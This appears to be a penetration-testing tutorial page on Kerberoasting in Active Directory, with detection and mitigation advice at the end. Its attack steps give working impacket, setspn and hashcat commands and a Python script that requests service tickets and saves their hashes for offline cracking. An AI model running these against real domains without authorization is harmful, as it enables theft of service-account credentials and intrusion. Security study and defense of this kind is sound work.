Kerberoasting

Active Directory

what is it?

Kerberoasting is an Active Directory attack that allows any authenticated domain user to request Kerberos service tickets (TGS) for accounts that have a Service Principal Name (SPN) set. Those tickets are encrypted with the service account’s NTLM hash, meaning they can be taken offline and cracked without any further interaction with the domain controller.

The attack is particularly effective because SPNs are often set on service accounts with weak passwords, and requesting a TGS is a normal, logged operation that blends in with everyday traffic.

requirements

  • Any valid domain user account (no elevated privileges needed)
  • Network access to the domain controller
  • At least one service account with an SPN registered

attack steps

1. enumerate SPNs

Find accounts with SPNs set using impacket or native tools:

1# impacket
2GetUserSPNs.py domain.local/user:password -dc-ip 10.0.0.1
3
4# PowerShell (on-box)
5setspn -T domain.local -Q */*

2. request and export tickets

1# request tickets and dump to file for offline cracking
2GetUserSPNs.py domain.local/user:password -dc-ip 10.0.0.1 -request -outputfile hashes.txt

3. crack offline

1hashcat -m 13100 hashes.txt /path/to/wordlist.txt --rules-file best64.rule

-m 13100 is the hashcat mode for Kerberos 5 TGS-REP etype 23 (RC4).

full automation script

 1#!/usr/bin/env python3
 2# kerberoast.py — enumerate, request, and save TGS hashes
 3import subprocess
 4import argparse
 5import sys
 6
 7def get_spns(domain, user, password, dc_ip):
 8    cmd = [
 9        "GetUserSPNs.py",
10        f"{domain}/{user}:{password}",
11        "-dc-ip", dc_ip,
12        "-request",
13        "-outputfile", "hashes.txt"
14    ]
15    print(f"[*] Targeting DC: {dc_ip}")
16    print(f"[*] Enumerating SPNs for {domain}...")
17    result = subprocess.run(cmd, capture_output=True, text=True)
18    if result.returncode == 0:
19        print("[+] Hashes saved to hashes.txt")
20        print(result.stdout)
21    else:
22        print("[-] Failed:", result.stderr, file=sys.stderr)
23
24if __name__ == "__main__":
25    parser = argparse.ArgumentParser()
26    parser.add_argument("domain")
27    parser.add_argument("user")
28    parser.add_argument("password")
29    parser.add_argument("dc_ip")
30    args = parser.parse_args()
31    get_spns(args.domain, args.user, args.password, args.dc_ip)

detection

  • Event ID 4769 — Kerberos service ticket request. Look for a spike in requests from a single account, or requests for RC4 encryption (etype 0x17) when AES is the domain default.
  • Honeypot SPNs — register a fake SPN on a decoy account with a strong password and alert on any TGS request for it.

mitigation

  • Use Group Managed Service Accounts (gMSA) — passwords are 120 characters, auto-rotated, and uncrackable in practice.
  • Enforce AES-only Kerberos encryption on service accounts to prevent RC4 downgrade.
  • Audit accounts with SPNs regularly: any interactive-login service account is a risk.

tools